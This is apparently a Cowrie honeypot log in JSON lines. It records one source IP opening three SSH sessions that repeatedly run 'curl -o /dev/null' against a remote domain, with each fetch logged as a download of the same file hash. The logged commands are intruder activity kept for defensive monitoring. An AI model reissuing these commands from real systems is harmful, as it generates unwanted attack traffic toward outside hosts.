{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.665717Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.666424Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.671685Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.673505Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.678342Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.679033Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.681125Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.682051Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.682580Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.714820Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.715472Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.720546Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.724236Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.727057Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.729643Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.731734Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.734141Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.735850Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.763534Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.764160Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.768729Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.770363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.773212Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.773790Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.775574Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.776086Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.780273Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.818134Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.818742Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.821082Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.821474Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.822905Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.823511Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.826367Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.828407Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.859323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.860287Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.860852Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.863549Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.864098Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.868168Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.869407Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.872154Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.872694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.876416Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.900852Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.901479Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.905813Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.907795Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.909873Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.911410Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.912133Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.918614Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.919227Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.944013Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.944743Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.949103Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.950333Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.952440Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.953522Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.954112Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.956839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.957351Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.983017Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.983656Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.987896Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.989718Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.995493Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:34.997377Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:34.998137Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.018439Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.019157Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.021375Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.021947Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.024694Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.027282Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.029327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.049643Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.050278Z","src_ip":"212.227.125.160","session":"9f264c568782"}
